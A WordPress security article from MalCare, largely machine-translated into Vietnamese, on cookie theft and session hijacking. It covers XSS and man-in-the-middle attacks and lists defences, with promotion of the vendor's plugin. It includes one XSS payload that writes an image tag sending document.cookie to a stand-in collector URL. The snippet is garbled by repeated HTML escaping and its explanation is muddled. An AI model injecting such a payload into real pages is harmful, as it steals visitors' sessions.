Bạn có biết rằng trang web của bạn sử dụng cookie để lưu trữ dữ liệu bí mật? Bạn có biết tin tặc có thể dễ dàng đánh cắp cookie của bạn không? Điều này có thể khiến trang web và khách truy cập của bạn gặp rủi ro!
Cookie lưu trữ tất cả các loại thông tin - từ sở thích quảng cáo của khách hàng đến thông tin đăng nhập và thông tin thẻ tín dụng. Cookie được sử dụng rộng rãi trên internet và điều đáng sợ là tần suất chúng bị đánh cắp.
Nếu bạn là nạn nhân của hành vi đánh cắp cookie hoặc chiếm quyền điều khiển phiên, thì hậu quả của nó là rất nghiêm trọng. Bạn không chỉ mất doanh thu và sự tin tưởng của khách truy cập mà còn có thể phải đối mặt với các vấn đề pháp lý và tiền phạt nặng nề!
Nhưng đừng lo lắng vì hôm nay, chúng tôi sẽ hướng dẫn bạn mọi thứ bạn cần biết để ngăn chặn những cuộc tấn công này!
Trong hướng dẫn này, trước tiên chúng ta sẽ tìm hiểu cách tin tặc đánh cắp cookie, sau đó chúng ta sẽ xem xét các biện pháp ngăn chặn.
TL; DR : Lo lắng về trang web WordPress của bạn? Bạn có thể bảo mật trang web của mình ngay bây giờ bằng cách cài đặt Plugin bảo vệ chống trộm cắp phiên &lấy cắp cookie . Nó sẽ quét trang web của bạn thường xuyên và cảnh báo cho bạn nếu một tin tặc tiêm bất kỳ mã độc hại nào có thể cho phép chúng ăn cắp cookie. Sử dụng plugin, bạn có thể dọn sạch bản hack ngay lập tức và tránh hậu quả.
Mục lục
→ Ăn cắp cookie là gì?
→ Làm thế nào tin tặc sử dụng kịch bản trang chéo (XSS) để đánh cắp cookie &chiếm đoạt phiên?
→ Làm thế nào để ngăn chặn việc đánh cắp cookie và chiếm quyền điều khiển phiên?
→ Các bước mà khách truy cập trang web có thể thực hiện để chống lại việc lấy cắp cookie
Ăn cắp cookie là gì?
Nhiều như chúng tôi mong muốn, việc ăn cắp bánh quy không đơn giản như một đứa trẻ thò tay vào lọ bánh quy! Đó là một quá trình phức tạp và để hiểu điều gì đang xảy ra, chúng ta cần phải tìm hiểu những điều cơ bản.
→ Cookie là gì?
Bạn có thể coi cookie như những bit dữ liệu nhỏ. Nó lưu trữ thông tin về sự tương tác của bạn với một trang web. Ví dụ:một trang web Thương mại điện tử muốn theo dõi hành trình của khách hàng - sản phẩm được tìm kiếm, sản phẩm đã mua, mặt hàng bị bỏ trong giỏ hàng hoặc trang nào họ truy cập.
Điều này cung cấp cho cửa hàng thông tin phân tích về những gì khách hàng thích, những trang nào được truy cập nhiều nhất, thời gian người dùng ở lại trên một trang, v.v. Sau đó, họ có thể sử dụng thông tin này để điều chỉnh những gì được hiển thị trên trang web theo sở thích của khách hàng.
Cookie cung cấp cho chủ sở hữu trang web thông tin chi tiết về những gì hoạt động và những gì không. Điều này giúp họ xác định những gì họ cần thay đổi hoặc cải thiện trên trang web của mình.
Cookie cũng được sử dụng để hiển thị quảng cáo có liên quan cho người dùng. Khi bạn truy cập các trang web, bạn sẽ nhận thấy các quảng cáo được hiển thị.
Những quảng cáo này thường phản ánh lịch sử tìm kiếm gần đây của bạn. Ví dụ:nếu bạn đã tìm kiếm "máy tính xách tay" trên Google, bạn sẽ nhận thấy rằng quảng cáo trên tất cả các trang web đều hiển thị cho bạn quảng cáo cho dell. Những quảng cáo này không phải là một phần của trang web mà được xử lý bởi các dịch vụ như Google Adsense.
Cookie giúp mọi thứ trở nên thuận tiện cho cả chủ sở hữu trang web và người dùng. Nó có thể thúc đẩy sự tham gia và dẫn đến bán hàng nhiều hơn, điều này rất tốt cho chủ sở hữu trang web. Đối với người mua, cookie giúp họ có được trải nghiệm được cá nhân hóa hơn trên trang web hoặc xem các quảng cáo có liên quan hơn.
Nhưng có rất nhiều nhược điểm mà chúng ta sẽ thảo luận ở phần sau.
[Quay lại đầu trang ↑]
→ Phiên trình duyệt và ID phiên là gì?
Khi bạn đăng nhập vào một trang web, một phiên giữa máy tính của bạn và trang web này sẽ được tạo.
Ví dụ:khi bạn đăng nhập vào Facebook, một phiên bắt đầu. Điều này cho phép bạn tiếp tục sử dụng Facebook (ngay cả khi bạn đóng và mở lại trình duyệt web) cho đến khi bạn nhấp vào 'đăng xuất' và kết thúc phiên.
Nếu phiên chưa được tạo, bạn cần tiếp tục đăng nhập mọi lúc bạn muốn có dữ liệu mới. Ví dụ:nếu bạn muốn rời khỏi nguồn cấp tin tức Facebook của mình và xem trang hồ sơ của một người bạn, bạn sẽ đăng xuất khỏi Facebook và cần nhập lại thông tin đăng nhập của mình để đăng nhập và xem hồ sơ của người bạn đó.
Đây là lý do tại sao các phiên là cần thiết. Nó giúp bạn luôn đăng nhập để có thể tiếp tục duyệt qua các trang web khác nhau và điều hướng trang web.
Điều quan trọng cần lưu ý ở đây là mỗi phiên tạo ra một tập hợp các cookie. Chúng tôi có thể gọi những cookie phiên này. Và mỗi cookie phiên có một ID phiên duy nhất.
Trang web sử dụng ID này để xác thực người dùng và thiết lập kết nối đáng tin cậy.
Ví dụ, để đăng nhập Facebook, bạn cần nhập tên người dùng và mật khẩu của mình. Tiếp theo, một phiên được tạo với một ID duy nhất. Bất kỳ yêu cầu nào bạn thực hiện với trang web Facebook sẽ được xác thực bằng ID này. Vì vậy, khi bạn muốn xem một trang khác, bạn sẽ gửi một yêu cầu đến máy chủ Facebook để hiển thị trang đó. Facebook xác minh ID và hiển thị nội dung bạn muốn xem.
Giờ đây, tin tặc có thể chiếm quyền điều khiển phiên của bạn và lạm dụng kết nối đáng tin cậy này. Họ có thể gửi yêu cầu độc hại thay mặt bạn. Hãy xem cách thực hiện.
[Quay lại đầu trang ↑]
→ Mối quan tâm về bảo mật với cookie là gì?
Khi cookie được tạo, chỉ bạn - chủ sở hữu trang web mới có thể xem được. Không có trang web nào khác có thể xem cookie của bạn. Chúng chỉ thuộc về bạn.
Nhưng những cookie này di chuyển trên internet. Chúng được sử dụng bởi các dịch vụ quảng cáo và dịch vụ phân tích. Vì vậy, các cookie này được trả về từ máy chủ này đến máy chủ khác trên toàn cầu. Nếu kết nối không an toàn, tin tặc có thể dễ dàng chặn và đánh cắp các cookie này.
Bây giờ, bạn có thể nghĩ rằng nếu một hacker quản lý để có được thông tin về sở thích mua sắm của bạn, thì thật tuyệt, phải không?
Vấn đề là cookie được lưu trữ nhiều hơn là chỉ thông tin về sở thích mua sắm của bạn. Nó cũng lưu trữ chi tiết ngân hàng và thông tin cá nhân chẳng hạn như địa chỉ giao hàng và chi tiết liên hệ của bạn.
Nếu loại thông tin này rơi vào tay kẻ xấu, nó có thể bị sử dụng sai cho các hoạt động gian lận.
Một trong những cách phổ biến nhất mà tin tặc đánh cắp cookie là nếu họ đang sử dụng cùng một wifi với bạn. Loại hack wifi này được gọi là tấn công man-in-the-middle và chỉ có thể diễn ra nếu cả hai được kết nối với cùng một mạng không dây. Đây là lý do tại sao bạn nên không bao giờ sử dụng wifi công cộng mà không được bảo đảm hoặc được sử dụng bởi nhiều người. Điều này cũng có thể xảy ra với những người dùng trong cùng một mạng máy tính.
Một số phương pháp khác bao gồm đánh hơi gói và bằng cách khai thác lỗ hổng được gọi là tập lệnh trang web chéo. Hôm nay, chúng tôi sẽ cho bạn thấy chi tiết cách hoạt động của tính năng ăn cắp cookie XSS.
[Quay lại đầu trang ↑]
Cách tin tặc sử dụng kịch bản trang web chéo (XSS) để lấy cắp cookie &chiếm quyền điều khiển phiên?
Để cho bạn thấy cách tin tặc đánh cắp cookie bằng cách sử dụng các cuộc tấn công tập lệnh trên nhiều trang web (XSS), chúng tôi sẽ sử dụng một ví dụ. Giả sử bạn truy cập một trang web có phần nhận xét trên đó.
Mọi nhận xét của bạn sẽ được gửi đến cơ sở dữ liệu của trang web. Tốt nhất, phần nhận xét này nên được định cấu hình để chỉ chấp nhận văn bản bằng tiếng Anh thuần túy. Nhưng nếu nó cũng chấp nhận các ký tự đặc biệt, điều này làm cho nó dễ bị XSS.
Tin tặc có thể nhập mã độc hại của riêng họ, mã này sẽ được gửi đến cơ sở dữ liệu. Khi vào bên trong, mã sẽ được thực thi. Có rất nhiều mã mà tin tặc có thể chèn vào trang web để thực hiện tất cả các loại hoạt động độc hại như tạo quản trị viên trang web mới hoặc ăn cắp cookie.
Để đánh cắp cookie, tin tặc có thể nhập mã sau:
Lưu ý:Đây không phải là hướng dẫn về cách lấy cắp cookie. Bài viết này nhằm mục đích làm cho chủ sở hữu trang web biết cách tin tặc có thể ăn cắp cookie. Chúng tôi không khuyên bạn thực hiện bất kỳ hoạt động bất hợp pháp nào.
[php]
document.write ('& amp; amp; amp; amp; amp; amp; amp; amp; amp; amp; amp; amp; lt; img src =& amp; amp; amp; amp; amp; amp; amp; amp; amp; amp; quot; https://localhost/submitcookie.php? cookie ='
+ Escape (document.cookie) + ‘& amp; amp; amp; amp; amp; amp; amp; amp; amp; amp; quot; / & amp; amp; amp; amp; amp; amp; amp; amp; amp; amp; amp; amp; amp; gt;);
[/ php]
Trong phần bình luận, đoạn mã này sẽ xuất hiện dưới dạng hình ảnh. Nếu bạn (với tư cách là khách truy cập) nhấp vào nó, bạn sẽ thấy một hình ảnh hiển thị. Nhưng còn nhiều điều hơn chỉ xảy ra.
Khi bạn nhấp vào hình ảnh, tệp PHP này sẽ âm thầm thực thi mã và lấy cookie phiên của bạn và ID phiên của bạn.
Giờ đây, tin tặc có thể tạo lại phiên của bạn và đóng vai bạn trên trang web đó. Họ có thể thực hiện vô số hành vi độc hại. Ví dụ:nếu cookie của bạn chứa thẻ tín dụng của bạn hoặc bất kỳ thông tin thanh toán nào khác, họ có thể mua hàng.
May mắn thay, có những biện pháp phòng ngừa để bảo vệ chủ sở hữu trang web cũng như những người truy cập trang web khỏi những vụ tấn công này.
Không bao giờ nhấp vào các liên kết đáng ngờ trong phần nhận xét của các trang web và trong email. Bạn có thể trở thành nạn nhân của hành vi trộm cắp cookie. Nhấp để Tweet[Quay lại đầu trang ↑]
Làm thế nào để ngăn chặn việc đánh cắp cookie và chiếm quyền điều khiển phiên?
Có hai bên đóng vai trò ngăn chặn hành vi trộm cắp cookie và chiếm quyền điều khiển phiên - chủ sở hữu trang web và khách truy cập. Chúng tôi sẽ thảo luận về các biện pháp phòng ngừa cho cả hai bên.
→ Các biện pháp mà chủ sở hữu trang web có thể thực hiện để chống lại hành vi ăn cắp cookie
Là chủ sở hữu trang web, nếu bạn không có nhà phân tích bảo mật để xử lý tất cả cho bạn, bạn cần thực hiện các biện pháp phòng ngừa sau:
1. Cài đặt chứng chỉ SSL
Dữ liệu được chuyển liên tục giữa trình duyệt của người dùng và máy chủ web của bạn. Không có SSL, dữ liệu này (cookie) được gửi ở dạng văn bản thuần túy. Nếu một tin tặc chặn dữ liệu này, họ có thể đọc nó một cách đơn giản. Vì vậy, nếu nó chứa thông tin đăng nhập, nó sẽ bị lộ.
SSL (Lớp cổng bảo mật) sẽ mã hóa dữ liệu trước khi chuyển. Vì vậy, ngay cả khi tin tặc đánh cắp được nó, chúng cũng không thể đọc được dữ liệu.
Bạn có thể nhận chứng chỉ SSL thông qua công ty lưu trữ web của mình hoặc từ nhà cung cấp SSL. Bạn cũng có thể nhận chứng chỉ SSL miễn phí cơ bản từ Let’s Encrypt.
2. Cài đặt một Plugin bảo mật
Giữ một plugin bảo mật WordPress chẳng hạn như MalCare đang hoạt động trên trang web của bạn. Tường lửa của plugin sẽ ngăn các nỗ lực tấn công vào trang web của bạn và chặn các địa chỉ IP độc hại. Thêm vào đó, nó sẽ quét trang web của bạn thường xuyên và cảnh báo cho bạn nếu có bất kỳ mã độc hại nào bị hacker xâm nhập. Bạn có thể dọn dẹp trang web của mình ngay lập tức. Điều này sẽ giúp bạn phát hiện và xóa các nỗ lực hack như vậy ngay lập tức trước khi chúng gây ra bất kỳ tác hại nào.
3. Cập nhật trang web của bạn
Luôn cập nhật trang web của bạn, điều này bao gồm cài đặt WordPress, chủ đề và plugin. Chạy trên phần mềm lỗi thời sẽ mở ra nhiều điểm dễ bị tấn công trên trang web của bạn mà tin tặc có thể khai thác. Đảm bảo bạn cập nhật trang web của mình và khi có bản cập nhật mới.
Các bản cập nhật này không chỉ mang các tính năng mới và sửa lỗi mà còn sửa các lỗi bảo mật theo thời gian.
4. Quản lý trang web của bạn
WordPress.org đề xuất các biện pháp tăng cường trang web nhất định mà bạn nên thực hiện trên trang web của mình. Điều này bao gồm việc sử dụng tên người dùng mạnh và duy nhất và mật khẩu mạnh, chặn thực thi PHP trong các thư mục không xác định, vô hiệu hóa trình chỉnh sửa tệp trong các chủ đề và plugin, v.v. Bây giờ, tất cả điều này có thể giống như biệt ngữ đối với bạn, vì vậy chúng tôi đã tạo một hướng dẫn chi tiết từng bước về Làm cứng WordPress mà bạn có thể làm theo.
[Quay lại đầu trang ↑]
Các bước mà khách truy cập trang web có thể thực hiện để chống lại việc lấy cắp cookie
Là một khách truy cập trang web, bạn không cần phải tin tưởng một cách mù quáng rằng các trang web đã thực hiện các biện pháp bảo mật thích hợp. Bạn có thể tự bảo vệ mình bằng các giao thức bảo mật web sau.
1. Cài đặt phần mềm chống vi rút hiệu quả
Đảm bảo thiết bị bạn đang sử dụng để truy cập Internet đã được cài đặt phần mềm chống phần mềm độc hại. Điều này sẽ cảnh báo cho bạn nếu phần mềm độc hại được phát hiện khi bạn truy cập một trang web độc hại. Nó cũng sẽ xóa mọi phần mềm độc hại mà bạn có thể vô tình tải xuống hoặc cài đặt trên hệ thống của mình.
2. Không bao giờ nhấp vào các liên kết đáng ngờ
Tin tặc nhắm mục tiêu người dùng thông qua phần bình luận trên các trang web và qua email. Tránh nhấp vào các liên kết không đáng tin cậy, đặc biệt là những liên kết thu hút bạn bằng các ưu đãi hoặc chiết khấu hấp dẫn.
3. Tránh lưu trữ dữ liệu nhạy cảm
Storing credit card information on shopping websites makes checkout faster and more convenient. Saving passwords on web browsers like Google Chrome to auto log into websites eliminates the need to remember passwords!
But it all comes with a high risk of being stolen. It’s best to never store sensitive data on websites. It may save you a few seconds, but it also puts you at risk of being attacked.
4. Clear Cookies
You can clear your cookies regularly to get rid of any sensitive information stored in browsers like Google Chrome. Access History> Clear Browsing History. Here, tick the checkbox ‘Cookies and other site data’.
Choose the time range ‘All Time’ or one that is according to your preference. Next, click ‘Clear data’ and the cookies will be deleted from your browser’s history.
That brings us to an end to cookie stealing. We hope this article has helped you gain a better understanding of what exactly happens and how to prevent it.
This guide from MalCare helped me understand cookie stealing and how to take preventive measures against it. Check it out. Click to Tweet[Back to Top ↑]
Final Thoughts
As a website owner, you need to take protective measures to secure your own interests as well as your visitors, clients, and customers. But we understand that setting up a website and managing it is a hard task.
There is an endless number of things to take care of which is why WordPress security tends to take a backseat many times.
But ignoring the security aspect of your website can prove to be disastrous to all your other efforts.
An easy, quick and efficient solution is the MalCare security plugin. You can think of it as a security guard that you hire. It will work round the clock to regularly scan your website and protect it from attacks. You can rest assured that your website is in safe hands.
Keep your WordPress site protected with MalCare !